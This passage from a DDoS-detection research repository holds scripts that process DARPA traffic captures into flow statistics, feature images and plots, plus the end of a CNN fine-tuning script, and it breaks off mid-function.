81 | model.fit_generator( 82 | train_generator, 83 | nb_epoch=nb_epoch, 84 | samples_per_epoch=nb_train_samples, 85 | validation_data=validation_generator, 86 | nb_val_samples=nb_val_samples, 87 | class_weight='auto' 88 | ) 89 | 90 | # at this point, the top layers are well trained and we can start fine-tuning 91 | # convolutional layers from inception V3. We will freeze the bottom N layers 92 | # and train the remaining top layers. 93 | 94 | # let's visualize layer names and layer indices to see how many layers 95 | # we should freeze: 96 | for i, layer in enumerate(base_model.layers): 97 | print(i, layer.name) 98 | 99 | # we chose to train the top 2 inception blocks, i.e. we will freeze 100 | # the first 249 layers and unfreeze the rest: 101 | for layer in model.layers[:249]: 102 | layer.trainable = False 103 | for layer in model.layers[249:]: 104 | layer.trainable = True 105 | 106 | # we need to recompile the model for these modifications to take effect 107 | # we use SGD with a low learning rate 108 | from keras.optimizers import SGD 109 | model.compile(optimizer=SGD(lr=0.0001, momentum=0.9), 110 | loss='categorical_crossentropy') 111 | 112 | # we train our model again (this time fine-tuning the top 2 inception blocks 113 | # alongside the top Dense layers 114 | model.fit_generator( 115 | train_generator, 116 | nb_epoch=nb_epoch, 117 | samples_per_epoch=nb_train_samples, 118 | validation_data=validation_generator, 119 | nb_val_samples=nb_val_samples, 120 | class_weight='auto' 121 | ) 122 | -------------------------------------------------------------------------------- /darpa/attack_analysis.sh: -------------------------------------------------------------------------------- 1 | echo "#############WEEK1#############" 2 | echo "#############WEEK1_MONDAY#############" 3 | python attack_analysis.py training_data/week_1/monday.list 4 | echo "#############WEEK1_TUESDAY#############" 5 | python attack_analysis.py training_data/week_1/tuesday.list 6 | echo "#############WEEK1_WEDNESDAY#############" 7 | python attack_analysis.py training_data/week_1/wednesday.list 8 | echo "#############WEEK1_THURSDAY#############" 9 | python attack_analysis.py training_data/week_1/thursday.list 10 | echo "#############WEEK1_FRIDAY#############" 11 | python attack_analysis.py training_data/week_1/friday.list 12 | 13 | echo "#############WEEK2#############" 14 | echo "#############WEEK2_MONDAY#############" 15 | python attack_analysis.py training_data/week_2/monday.list 16 | echo "#############WEEK2_TUESDAY#############" 17 | python attack_analysis.py training_data/week_2/tuesday.list 18 | echo "#############WEEK2_WEDNESDAY#############" 19 | python attack_analysis.py training_data/week_2/wednesday.list 20 | echo "#############WEEK2_THURSDAY#############" 21 | python attack_analysis.py training_data/week_2/thursday.list 22 | echo "#############WEEK2_FRIDAY#############" 23 | python attack_analysis.py training_data/week_2/friday.list 24 | 25 | echo "#############WEEK3#############" 26 | echo "#############WEEK3_MONDAY#############" 27 | python attack_analysis.py training_data/week_3/monday.list 28 | echo "#############WEEK3_TUESDAY#############" 29 | python attack_analysis.py training_data/week_3/tuesday.list 30 | echo "#############WEEK3_WEDNESDAY#############" 31 | python attack_analysis.py training_data/week_3/wednesday.list 32 | echo "#############WEEK3_THURSDAY#############" 33 | python attack_analysis.py training_data/week_3/thursday.list 34 | echo "#############WEEK3_FRIDAY#############" 35 | python attack_analysis.py training_data/week_3/friday.list 36 | 37 | echo "#############WEEK4#############" 38 | echo "#############WEEK4_MONDAY#############" 39 | python attack_analysis.py training_data/week_4/monday.list 40 | echo "#############WEEK4_TUESDAY#############" 41 | python attack_analysis.py training_data/week_4/tuesday.list 42 | echo "#############WEEK4_WEDNESDAY#############" 43 | python attack_analysis.py training_data/week_4/wednesday.list 44 | echo "#############WEEK4_THURSDAY#############" 45 | python attack_analysis.py training_data/week_4/thursday.list 46 | echo "#############WEEK4_FRIDAY#############" 47 | python attack_analysis.py training_data/week_4/friday.list 48 | 49 | echo "#############WEEK5#############" 50 | echo "#############WEEK5_MONDAY#############" 51 | python attack_analysis.py training_data/week_5/monday.list 52 | echo "#############WEEK5_TUESDAY#############" 53 | python attack_analysis.py training_data/week_5/tuesday.list 54 | echo "#############WEEK5_WEDNESDAY#############" 55 | python attack_analysis.py training_data/week_5/wednesday.list 56 | echo "#############WEEK5_THURSDAY#############" 57 | python attack_analysis.py training_data/week_5/thursday.list 58 | echo "#############WEEK5_FRIDAY#############" 59 | python attack_analysis.py training_data/week_5/friday.list 60 | 61 | echo "#############WEEK6#############" 62 | echo "#############WEEK6_MONDAY#############" 63 | python attack_analysis.py training_data/week_6/monday.list 64 | echo "#############WEEK6_TUESDAY#############" 65 | python attack_analysis.py training_data/week_6/tuesday.list 66 | echo "#############WEEK6_WEDNESDAY#############" 67 | python attack_analysis.py training_data/week_6/wednesday.list 68 | echo "#############WEEK6_THURSDAY#############" 69 | python attack_analysis.py training_data/week_6/thursday.list 70 | echo "#############WEEK6_FRIDAY#############" 71 | python attack_analysis.py training_data/week_6/friday.list 72 | 73 | echo "#############WEEK7#############" 74 | echo "#############WEEK7_MONDAY#############" 75 | python attack_analysis.py training_data/week_7/monday.list 76 | echo "#############WEEK7_TUESDAY#############" 77 | python attack_analysis.py training_data/week_7/tuesday.list 78 | echo "#############WEEK7_WEDNESDAY#############" 79 | python attack_analysis.py training_data/week_7/wednesday.list 80 | echo "#############WEEK7_THURSDAY#############" 81 | python attack_analysis.py training_data/week_7/thursday.list 82 | echo "#############WEEK7_FRIDAY#############" 83 | python attack_analysis.py training_data/week_7/friday.list 84 | 85 | -------------------------------------------------------------------------------- /raw_data/run.sh: -------------------------------------------------------------------------------- 1 | date > log 2 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_1/monday 3 | echo ${data} 4 | sudo python tcpdump_regenerator.py ${data} >> log 5 | date >> log 6 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_1/tuesday 7 | echo ${data} 8 | sudo python tcpdump_regenerator.py ${data} >> log 9 | date >> log 10 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_1/wednesday 11 | echo ${data} 12 | sudo python tcpdump_regenerator.py ${data} >> log 13 | date >> log 14 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_1/thursday 15 | echo ${data} 16 | sudo python tcpdump_regenerator.py ${data} >> log 17 | date >> log 18 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_1/friday 19 | echo ${data} 20 | sudo python tcpdump_regenerator.py ${data} >> log 21 | date >> log 22 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_2/monday 23 | echo ${data} 24 | sudo python tcpdump_regenerator.py ${data} >> log 25 | date >> log 26 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_2/tuesday 27 | echo ${data} 28 | sudo python tcpdump_regenerator.py ${data} >> log 29 | date >> log 30 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_2/wednesday 31 | echo ${data} 32 | sudo python tcpdump_regenerator.py ${data} >> log 33 | date >> log 34 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_2/thursday 35 | echo ${data} 36 | sudo python tcpdump_regenerator.py ${data} >> log 37 | date >> log 38 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_2/friday 39 | echo ${data} 40 | sudo python tcpdump_regenerator.py ${data} >> log 41 | date >> log 42 | date > log 43 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_3/monday 44 | echo ${data} 45 | sudo python tcpdump_regenerator.py ${data} >> log 46 | date >> log 47 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_3/tuesday 48 | echo ${data} 49 | sudo python tcpdump_regenerator.py ${data} >> log 50 | date >> log 51 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_3/wednesday 52 | echo ${data} 53 | sudo python tcpdump_regenerator.py ${data} >> log 54 | date >> log 55 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_3/thursday 56 | echo ${data} 57 | sudo python tcpdump_regenerator.py ${data} >> log 58 | date >> log 59 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_3/friday 60 | echo ${data} 61 | sudo python tcpdump_regenerator.py ${data} >> log 62 | date >> log 63 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_4/monday 64 | echo ${data} 65 | sudo python tcpdump_regenerator.py ${data} >> log 66 | date >> log 67 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_4/tuesday 68 | echo ${data} 69 | sudo python tcpdump_regenerator.py ${data} >> log 70 | date >> log 71 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_4/wednesday 72 | echo ${data} 73 | sudo python tcpdump_regenerator.py ${data} >> log 74 | date >> log 75 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_4/thursday 76 | echo ${data} 77 | sudo python tcpdump_regenerator.py ${data} >> log 78 | date >> log 79 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_4/friday 80 | echo ${data} 81 | sudo python tcpdump_regenerator.py ${data} >> log 82 | date >> log 83 | date > log 84 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_5/monday 85 | echo ${data} 86 | sudo python tcpdump_regenerator.py ${data} >> log 87 | date >> log 88 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_5/tuesday 89 | echo ${data} 90 | sudo python tcpdump_regenerator.py ${data} >> log 91 | date >> log 92 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_5/wednesday 93 | echo ${data} 94 | sudo python tcpdump_regenerator.py ${data} >> log 95 | date >> log 96 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_5/thursday 97 | echo ${data} 98 | sudo python tcpdump_regenerator.py ${data} >> log 99 | date >> log 100 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_5/friday 101 | echo ${data} 102 | sudo python tcpdump_regenerator.py ${data} >> log 103 | date >> log 104 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_6/monday 105 | echo ${data} 106 | sudo python tcpdump_regenerator.py ${data} >> log 107 | date >> log 108 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_6/tuesday 109 | echo ${data} 110 | sudo python tcpdump_regenerator.py ${data} >> log 111 | date >> log 112 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_6/wednesday 113 | echo ${data} 114 | sudo python tcpdump_regenerator.py ${data} >> log 115 | date >> log 116 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_6/thursday 117 | echo ${data} 118 | sudo python tcpdump_regenerator.py ${data} >> log 119 | date >> log 120 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_6/friday 121 | echo ${data} 122 | sudo python tcpdump_regenerator.py ${data} >> log 123 | date >> log 124 | date > log 125 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_7/monday 126 | echo ${data} 127 | sudo python tcpdump_regenerator.py ${data} >> log 128 | date >> log 129 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_7/tuesday 130 | echo ${data} 131 | sudo python tcpdump_regenerator.py ${data} >> log 132 | date >> log 133 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_7/wednesday 134 | echo ${data} 135 | sudo python tcpdump_regenerator.py ${data} >> log 136 | date >> log 137 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_7/thursday 138 | echo ${data} 139 | sudo python tcpdump_regenerator.py ${data} >> log 140 | date >> log 141 | data=/home/laochanlam/git/DDoS_Experiment/darpa/training_data/week_7/friday 142 | echo ${data} 143 | sudo python tcpdump_regenerator.py ${data} >> log 144 | date >> log -------------------------------------------------------------------------------- /image/draw.py: -------------------------------------------------------------------------------- 1 | from PIL import Image 2 | import sys 3 | import os 4 | 5 | PATCH_NUM = 5 6 | FEATURE = 7 7 | 8 | HEIGHT = PATCH_NUM 9 | WIDTH = FEATURE 10 | 11 | 12 | def draw_7tuple(feature_list): 13 | PATCH_NUM = 5 14 | FEATURE = 7 15 | HEIGHT = PATCH_NUM 16 | WIDTH = FEATURE 17 | img = Image.new("RGB", (WIDTH, HEIGHT), "black") 18 | pixels = img.load() 19 | # print(pixels) 20 | # patch_number = int(raw_input("Number of patch to generate image: ")) 21 | # from 0 ~ patch number 22 | counter = 0 23 | while len(feature_list) >= HEIGHT: 24 | # print(len(feature_list)) 25 | for i in range(HEIGHT): 26 | # print("\n############Patch%d############") 27 | # print(feature_list[0]) 28 | 29 | # 3. packet count ratio 30 | MAXIMUN_THRESHOLD = 0.2 31 | unit = MAXIMUN_THRESHOLD / float(256) 32 | r = float(feature_list[i][2]) / unit 33 | pixels[0, i] = (int(r), 0, 0) 34 | 35 | # 24. PPf_all 36 | MAXIMUN_THRESHOLD = 1 37 | unit = MAXIMUN_THRESHOLD / float(256) 38 | g = float(feature_list[i][23]) / unit 39 | pixels[1, i] = (0, int(g), 0) 40 | # 25. PPf_interval 41 | MAXIMUN_THRESHOLD = 1 42 | unit = MAXIMUN_THRESHOLD / float(256) 43 | g = float(feature_list[i][24]) / unit 44 | pixels[2, i] = (0, int(g), 0) 45 | # 26. PPf_ratio 46 | MAXIMUN_THRESHOLD = 10 47 | unit = MAXIMUN_THRESHOLD / float(256) 48 | g = float(feature_list[i][25]) / unit 49 | pixels[3, i] = (0, int(g), 0) 50 | 51 | # 28. Entropy_all 52 | MAXIMUN_THRESHOLD = 5.5 53 | unit = MAXIMUN_THRESHOLD / float(256) 54 | b = float(feature_list[i][27]) / unit 55 | pixels[4, i] = (0, 0, int(b)) 56 | # 29. Entropy_interval 57 | MAXIMUN_THRESHOLD = 5 58 | unit = MAXIMUN_THRESHOLD / float(256) 59 | b = float(feature_list[i][28]) / unit 60 | pixels[5, i] = (0, 0, int(b)) 61 | # 30. Entropy_ratio 62 | MAXIMUN_THRESHOLD = 4 63 | unit = MAXIMUN_THRESHOLD / float(256) 64 | b = float(feature_list[i][29]) / unit 65 | pixels[6, i] = (0, 0, int(b)) 66 | 67 | 68 | # print(pixels[6, i]) 69 | 70 | feature_list = feature_list[5:] 71 | 72 | # APf = int(raw_input("APf: ")) 73 | # ABf = int(raw_input("ABf: ")) 74 | # ADf = int(raw_input("ADf: ")) 75 | # GSf = int(raw_input("GSf: ")) 76 | # GDP = int(raw_input("GDP: ")) 77 | 78 | # Maximun PPf is 1, ratio of two-way flow & one-way flow 79 | # PPf = int(raw_input("PPf: ")) 80 | 81 | # upper_bound = (HEIGHT / patch_number) * i 82 | # if i != patch_number-1: 83 | # lower_bound = (HEIGHT / patch_number) * (i+1) 84 | # else: 85 | # lower_bound = HEIGHT 86 | 87 | # # from 0 to feature 88 | # for j in range(FEATURE): 89 | # # from upper bound to lower bound 90 | # for k in range(upper_bound, lower_bound): 91 | # left_bound = (WIDTH / FEATURE) * j 92 | # if j != FEATURE - 1: 93 | # right_bound = (WIDTH / FEATURE) * (j+1) 94 | # else: 95 | # right_bound = WIDTH 96 | # # from left_bound to right bound 97 | # for l in range(left_bound, right_bound): 98 | # pixels[k, l] = (255, 0, 0) 99 | # img.save("test.jpg") 100 | counter = counter + 1 101 | img.save("abnormal_pic/" + str(counter) + ".jpg") 102 | # pixels = list(img.getdata()) 103 | 104 | 105 | # print(pixels[0, 0]) 106 | 107 | def main(): 108 | if len(sys.argv) != 2: 109 | print "Usage : %s " % sys.argv[0] 110 | sys.exit(1) 111 | 112 | feature_list = [] 113 | filepath = sys.argv[1] 114 | filename_list = os.listdir(filepath) 115 | filename_list = sorted(filename_list) 116 | 117 | for i in range(len(filename_list)): 118 | with open(filepath + "/" + filename_list[i]) as f: 119 | content = f.read().splitlines() 120 | feature_list.append(content) 121 | 122 | 123 | # global feature_list 124 | # print(feature_list[0]) 125 | 126 | 127 | draw_7tuple(feature_list) 128 | 129 | 130 | # if content[3] == 0: 131 | # content[5] = 0 132 | # else: 133 | # content[5] = float(content[4]) - float(content[3]) /float(content[3]) 134 | # # all packet count 135 | # # feature_list.append(content[0]) 136 | # # window's packet count 137 | # # feature_list.append(content[1]) 138 | # # packet count ratio 139 | # feature_list.append(content[2]) 140 | # # mean of all packte count 141 | # feature_list.append(content[3]) 142 | # # mean of window's packet count 143 | # feature_list.append(content[4]) 144 | # # packet mean ratio 145 | 146 | # feature_list.append(content[5]) 147 | # # mean of all bytes count 148 | # feature_list.append(content[6]) 149 | # # mean of window's bytes count 150 | # feature_list.append(content[7]) 151 | # # bytes count ratio 152 | # feature_list.append(content[8]) 153 | # # pair-flow 154 | # # feature_list.append(content[9]) 155 | # # flow 156 | # # feature_list.append(content[10]) 157 | # # window's pair-flow 158 | # # feature_list.append(content[11]) 159 | # # window's flow 160 | # # feature_list.append(content[12]) 161 | # # percentage of all pair-flow 162 | # feature_list.append(content[13]) 163 | # # percentage of window's pair-flow 164 | # feature_list.append(content[14]) 165 | # # pair-flow ratio 166 | # feature_list.append(content[15]) 167 | # # entropy 168 | # feature_list.append(content[16]) 169 | # # window's entropy 170 | # feature_list.append(content[17]) 171 | # # entropy ratio 172 | # feature_list.append(content[18]) 173 | 174 | # print(feature_list) 175 | # # draw() 176 | 177 | if __name__ == "__main__": 178 | main() 179 | -------------------------------------------------------------------------------- /stat/image_analysis.m: -------------------------------------------------------------------------------- 1 | %% data reading 2 | capture = dir('../raw_data/data_normal/07*'); 3 | % capture = dir('data/07*'); 4 | numcapture = length(capture); 5 | mydata = cell(1, numcapture); 6 | filename = {capture.name}; 7 | 8 | Normal_featureMat = zeros(numcapture, 31); 9 | 10 | for k = 1:numcapture 11 | pathname = strcat('../raw_data/data_normal/', filename{k}); 12 | fileID = fopen(pathname,'r'); 13 | formatSpec = '%f'; 14 | C = fscanf(fileID, formatSpec); 15 | C = transpose(C); 16 | Normal_featureMat(k,:) = C; 17 | fclose(fileID); 18 | end 19 | 20 | %% data reading 21 | capture = dir('../raw_data/data_abnormal/07*'); 22 | % capture = dir('data/07*'); 23 | numcapture = length(capture); 24 | mydata = cell(1, numcapture); 25 | filename = {capture.name}; 26 | 27 | Abnormal_featureMat = zeros(numcapture, 31); 28 | 29 | for k = 1:numcapture 30 | pathname = strcat('../raw_data/data_abnormal/', filename{k}); 31 | fileID = fopen(pathname,'r'); 32 | formatSpec = '%f'; 33 | C = fscanf(fileID, formatSpec); 34 | C = transpose(C); 35 | Abnormal_featureMat(k,:) = C; 36 | fclose(fileID); 37 | end 38 | 39 | 40 | %% data processing 41 | 42 | % % 1Packet_count_total 43 | % figure 44 | % plot(Normal_featureMat(:,1), 'b.'); hold on; 45 | % plot(Abnormal_featureMat(:,1), 'r.'); hold off; 46 | % xlim([0 6000]); 47 | % xlabel('Num of samples'); 48 | % ylabel('Num of packets'); 49 | 50 | % % 2Packet_count_interval 51 | % figure 52 | % plot(Normal_featureMat(:,2), 'b.'); hold on; 53 | % plot(Abnormal_featureMat(:,2), 'r.'); hold off; 54 | % xlim([0 6000]); 55 | % xlabel('Num of samples'); 56 | % ylabel('Num of packets'); 57 | 58 | % % 3Packet count ratio 59 | % figure 60 | % plot(Normal_featureMat(:, 3), 'b.'); hold on; 61 | % plot(Abnormal_featureMat(:, 3), 'r.'); hold off; 62 | % xlim([0 6000]); ylim([0, 0.6]); 63 | % xlabel('Num of samples'); 64 | % ylabel('Ratio'); 65 | 66 | % % 4mean of all packet count 67 | % figure 68 | % plot(Normal_featureMat(:,4), 'b.'); hold on; 69 | % plot(Abnormal_featureMat(:,4), 'r.'); hold off; 70 | % xlim([0 6000]); ylim([0 10000]); 71 | % xlabel('Num of samples'); 72 | % ylabel('Mean'); 73 | 74 | % % 5mean of interval packet count 75 | % figure 76 | % plot(Normal_featureMat(:,5), 'b.'); hold on; 77 | % plot(Abnormal_featureMat(:,5), 'r.'); hold off; 78 | % xlim([0 6000]); ylim([0 40]) 79 | % xlabel('Num of samples'); 80 | % ylabel('Mean'); 81 | 82 | % % 6packet_mean_ratio 83 | % figure 84 | % plot(Normal_featureMat(:,6), 'b.'); hold on; 85 | % plot(Abnormal_featureMat(:,6), 'r.'); hold off; 86 | % xlim([0 6000]); 87 | % ylim([0 8]); 88 | % xlabel('Num of Samples'); 89 | % ylabel('Ratio'); 90 | 91 | % % 7packet_mean_relative_distance 92 | % figure 93 | % plot(Normal_featureMat(:,7), 'b.'); hold on; 94 | % plot(Abnormal_featureMat(:,7), 'r.'); hold off; 95 | % xlim([0 6000]); 96 | % ylim([0 8000]); 97 | % xlabel('Num of samples'); 98 | % ylabel('Relative Distance'); 99 | 100 | 101 | % % 8median of all packet count 102 | % figure 103 | % plot(Normal_featureMat(:,8), 'b.'); hold on; 104 | % plot(Abnormal_featureMat(:,8), 'r.'); hold off; 105 | % xlim([0 6000]); 106 | % xlabel('Num of samples'); 107 | % ylabel('Median'); 108 | 109 | % % 9median of interval packet count 110 | % figure 111 | % plot(Normal_featureMat(:,9), 'b.'); hold on; 112 | % plot(Abnormal_featureMat(:,9), 'r.'); hold off; 113 | % xlim([0 6000]); ylim([0 20]); 114 | % xlabel('Num of samples'); 115 | % ylabel('Median'); 116 | 117 | % % 10packet_median_ratio 118 | % figure 119 | % plot(Normal_featureMat(:,10), 'b.'); hold on; 120 | % plot(Abnormal_featureMat(:,10), 'r.'); hold off; 121 | % xlim([0 6000]); 122 | % ylim([0 12]); 123 | % xlabel('Num of Samples'); 124 | % ylabel('Ratio'); 125 | 126 | % % 11packet_median_relative_distance 127 | % figure 128 | % plot(Normal_featureMat(:,11), 'b.'); hold on; 129 | % plot(Abnormal_featureMat(:,11), 'r.'); hold off; 130 | % xlim([0 6000]); 131 | % ylim([0 16]); 132 | % xlabel('Num of samples'); 133 | % ylabel('Relative Distance'); 134 | 135 | 136 | % 12mean_of_all_bytes_count 137 | % figure 138 | % plot(Normal_featureMat(:,12), 'b.'); hold on; 139 | % plot(Abnormal_featureMat(:,12), 'r.'); hold off; 140 | % xlim([0 6000]); 141 | % xlabel('Num of samples'); 142 | % ylabel('Mean'); 143 | 144 | % % 13mean_of_interval_bytes_count 145 | % figure 146 | % plot(Normal_featureMat(:,13), 'b.'); hold on; 147 | % plot(Abnormal_featureMat(:,13), 'r.'); hold off; 148 | % xlim([0 6000]); ylim([0 15000]) 149 | % xlabel('Num of samples'); 150 | % ylabel('Mean'); 151 | 152 | % % 14bytes_mean_ratio 153 | % figure 154 | % plot(Normal_featureMat(:,14), 'b.'); hold on; 155 | % plot(Abnormal_featureMat(:,14), 'r.'); hold off; 156 | % xlim([0 6000]); 157 | % ylim([0 10]); 158 | % xlabel('Num of Samples'); 159 | % ylabel('Ratio'); 160 | 161 | % % 15bytes_mean_relative_distance 162 | % figure 163 | % plot(Normal_featureMat(:,15), 'b.'); hold on; 164 | % plot(Abnormal_featureMat(:,15), 'r.'); hold off; 165 | % xlim([0 6000]); 166 | % ylim([0 4000000]); 167 | % xlabel('Num of samples'); 168 | % ylabel('Relative Distance'); 169 | 170 | % % 16median_of_all_bytes_count 171 | % figure 172 | % plot(Normal_featureMat(:,16), 'b.'); hold on; 173 | % plot(Abnormal_featureMat(:,16), 'r.'); hold off; 174 | % xlim([0 6000]); 175 | % xlabel('Num of samples'); 176 | % ylabel('Median'); 177 | 178 | % % 17median_of_interval_bytes_count 179 | % figure 180 | % plot(Normal_featureMat(:,17), 'b.'); hold on; 181 | % plot(Abnormal_featureMat(:,17), 'r.'); hold off; 182 | % xlim([0 6000]); ylim([0 20000]) 183 | % xlabel('Num of samples'); 184 | % ylabel('Median'); 185 | 186 | % % 18packet_median_ratio 187 | % figure 188 | % plot(Normal_featureMat(:,18), 'b.'); hold on; 189 | % plot(Abnormal_featureMat(:,18), 'r.'); hold off; 190 | % xlim([0 6000]); 191 | % ylim([0 50]); 192 | % xlabel('Num of Samples'); 193 | % ylabel('Ratio'); 194 | 195 | % % 19packet_median_relative_distance 196 | % figure 197 | % plot(Normal_featureMat(:,19), 'b.'); hold on; 198 | % plot(Abnormal_featureMat(:,19), 'r.'); hold off; 199 | % xlim([0 6000]); 200 | % ylim([0 20000]); 201 | % xlabel('Num of samples'); 202 | % ylabel('Relative Distance'); 203 | 204 | % % 20pair_flow_all 205 | % figure 206 | % plot(Normal_featureMat(:,20), 'b.'); hold on; 207 | % plot(Abnormal_featureMat(:,20), 'r.'); hold off; 208 | % xlim([0 6000]); 209 | % % ylim([0 20000]); 210 | % xlabel('Num of samples'); 211 | % ylabel('Num of Pair-flow'); 212 | 213 | % % 21flow_all 214 | % figure 215 | % plot(Normal_featureMat(:,21), 'b.'); hold on; 216 | % plot(Abnormal_featureMat(:,21), 'r.'); hold off; 217 | % xlim([0 6000]); 218 | % % ylim([0 20000]); 219 | % xlabel('Num of samples'); 220 | % ylabel('Num of Flows'); 221 | 222 | % % 22pair_flow_interval 223 | % figure 224 | % plot(Normal_featureMat(:,22), 'b.'); hold on; 225 | % plot(Abnormal_featureMat(:,22), 'r.'); hold off; 226 | % xlim([0 6000]); 227 | % % ylim([0 20000]); 228 | % xlabel('Num of samples'); 229 | % ylabel('Num of Pair-flow'); 230 | % 231 | % % 23flow_interval 232 | % figure 233 | % plot(Normal_featureMat(:,23), 'b.'); hold on; 234 | % plot(Abnormal_featureMat(:,23), 'r.'); hold off; 235 | % xlim([0 6000]); 236 | % % ylim([0 20000]); 237 | % xlabel('Num of samples'); 238 | % ylabel('Num of Flows'); 239 | 240 | % % 24PPf_all 241 | % figure 242 | % plot(Normal_featureMat(:,24), 'b.'); hold on; 243 | % plot(Abnormal_featureMat(:,24), 'r.'); hold off; 244 | % xlim([0 6000]); 245 | % % ylim([0 20000]); 246 | % xlabel('Num of samples'); 247 | % ylabel('PPf'); 248 | 249 | % % 25PPf_interval 250 | % figure 251 | % plot(Normal_featureMat(:,25), 'b.'); hold on; 252 | % plot(Abnormal_featureMat(:,25), 'r.'); hold off; 253 | % xlim([0 6000]); 254 | % % ylim([0 20000]); 255 | % xlabel('Num of samples'); 256 | % ylabel('PPf'); 257 | 258 | % % 26pair_flow_ratio 259 | % figure 260 | % plot(Abnormal_featureMat(:,26), 'r.'); hold on; 261 | % plot(Normal_featureMat(:,26), 'b.'); hold off; 262 | % 263 | % xlim([0 6000]); 264 | % ylim([0 50]); 265 | % xlabel('Num of Samples'); 266 | % ylabel('Ratio'); 267 | 268 | % 27pair_flow_relative_distance 269 | % figure 270 | % plot(Normal_featureMat(:,27), 'b.'); hold on; 271 | % plot(Abnormal_featureMat(:,27), 'r.'); hold off; 272 | % xlim([0 6000]); 273 | % % ylim([0 20000]); 274 | % xlabel('Num of samples'); 275 | % ylabel('Relative Distance'); 276 | 277 | % % 28entropy_all 278 | % figure 279 | % plot(Normal_featureMat(:,28), 'b.'); hold on; 280 | % plot(Abnormal_featureMat(:,28), 'r.'); hold off; 281 | % xlim([0 6000]); 282 | % xlabel('Num of samples'); 283 | % ylabel('Entropy'); 284 | 285 | % % 29entropy_interval 286 | % figure 287 | % plot(Normal_featureMat(:,29), 'b.'); hold on; 288 | % plot(Abnormal_featureMat(:,29), 'r.'); hold off; 289 | % xlim([0 6000]); 290 | % xlabel('Num of samples'); 291 | % ylabel('Entropy'); 292 | 293 | 294 | % % 30entropy_ratio 295 | % figure 296 | % plot(Abnormal_featureMat(:,30), 'b.'); hold on; 297 | % plot(Normal_featureMat(:,30), 'r.'); hold off; 298 | % xlim([0 6000]); ylim([0 20]) 299 | % xlabel('Num of Samples'); 300 | % ylabel('Ratio'); 301 | 302 | % % % 31entropy_relative_distance 303 | % figure 304 | % plot(Normal_featureMat(:,31), 'b.'); hold on; 305 | % plot(Abnormal_featureMat(:,31), 'r.'); hold off; 306 | % xlim([0 6000]); 307 | % % ylim([0 8000]); 308 | % xlabel('Num of samples'); 309 | % ylabel('Relative Distance'); 310 | -------------------------------------------------------------------------------- /raw_data/tcpdump_regenerator_print.py: -------------------------------------------------------------------------------- 1 | 2 | from scapy.all import * 3 | from datetime import datetime 4 | import sys 5 | import subprocess 6 | from datetime import datetime 7 | from datetime import timedelta 8 | from collections import Counter 9 | from math import log 10 | from numpy import median 11 | from numpy import mean 12 | 13 | 14 | def data_analysis(lines): 15 | 16 | lines = lines.splitlines() 17 | packetcount_list = [] 18 | bytescount_list = [] 19 | dst_IP_counter = Counter() 20 | Pair_IP_hashlist = set() 21 | IP_hashlist = set() 22 | 23 | # window = 10s 24 | window = 10 25 | window_packetcount_list = [] 26 | window_bytescount_list = [] 27 | window_dst_IP_counter = Counter() 28 | window_Pair_IP_hashlist = set() 29 | window_IP_hashlist = set() 30 | 31 | dstIP_probability_list = [] 32 | window_dstIP_probability_list = [] 33 | entropy_list = [] 34 | window_entropy_list = [] 35 | 36 | # # n_packets 37 | for line in lines: 38 | line = line.split(",") 39 | # print(line) 40 | if (line[0][0:10] == "OFPST_FLOW"): 41 | continue 42 | if (line[5] == " priority=3"): 43 | # print(1) 44 | duration = float(line[1][10:-1]) 45 | packet_count = int(line[3][11:]) 46 | byte_count = int(line[4][9:]) 47 | src_IP = line[7][7:] 48 | dst_IP = line[8][7:] 49 | 50 | 51 | flow_IP = src_IP, dst_IP 52 | sorted_flow_IP = tuple(sorted(flow_IP)) 53 | print(sorted_flow_IP) 54 | 55 | packetcount_list.append(packet_count) 56 | bytescount_list.append(byte_count) 57 | Pair_IP_hashlist.add(hash(sorted_flow_IP)) 58 | IP_hashlist.add(hash(flow_IP)) 59 | 60 | dst_IP_counter[dst_IP] += 1 61 | 62 | if (duration - window <= 0): 63 | window_packetcount_list.append(stat.packet_count) 64 | window_bytescount_list.append(stat.byte_count) 65 | window_Pair_IP_hashlist.add(hash(sorted_flow_IP)) 66 | window_IP_hashlist.add(hash(flow_IP)) 67 | window_dst_IP_counter[dst_IP] += 1 68 | 69 | 70 | packetcount = len(packetcount_list) 71 | if (packetcount != 0): 72 | mean_packetcount = mean(packetcount_list) 73 | mean_bytescount = mean(bytescount_list) 74 | else: 75 | mean_packetcount = 0 76 | mean_bytescount = 0 77 | 78 | if (len(IP_hashlist) != 0): 79 | Num_Pair_flows = len(IP_hashlist) - len(Pair_IP_hashlist) 80 | PPf = 